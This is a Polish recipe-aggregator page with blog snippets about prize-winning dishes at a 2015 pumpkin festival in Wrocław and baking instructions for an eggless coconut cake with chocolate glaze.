Dolnośląski Festiwal Dyni, Wrocław 2015 180

wybrałyśmy co  następuje : Miejsce I w konkursie na najsmaczniejsza dynię czyli Lody dyniowe z sosem śliwkowo-dyniowym Miejsce II czyli dżem prozdrowotny dyniowo-sosnowy Miejsce III czyli Ciasto dyniowo-czekoladowe wielkie zaskoczenie czyli pyszny sernik dyniowy z sera koziego z obłędnym musem... I kilka foto spojrzeń na Ogród Botaniczny Uniwersytetu Wrocławskiego.  Nigdy w nim wcześniej nie byłam

Dzieje kuchennej Wiewióry
Ciasto kokosowe bez jajek, bez tłuszczu, z bakaliami 210

piec około 40 minut w nagrzanym do 180C piekarniku - - u mnie bez termoobiegu, na środkowym poziomie piekarnika . Stan upieczenia sprawdzać "testem patyczka" - będzie gotowe kiedy wyciągniemy suchy . Wystudzone ciasto polać polewą czekoladową. Polecam sprawdzony, metodą wielu rozczarowań, prób i błędów, przepis na idealną polewę czekoladową

Grunt to przepis!
Ciasto kokosowe bez jajek 180

piec około 40 minut w nagrzanym do 180C piekarniku - - u mnie bez termoobiegu, na środkowym poziomie piekarnika . Stan upieczenia sprawdzać "testem patyczka" - będzie gotowe kiedy wyciągniemy suchy . Wystudzone ciasto polać polewa czekoladową. Zwykle robię własną, na bazie sprawdzonego metoda prób i błędów przepisu na idealną polewę czekoladową . Tym razem jednak lenistwo wzięło górę i wykorzystałam kupną z białej czekolady

Grunt to przepis!

Proponowane wyszukiwania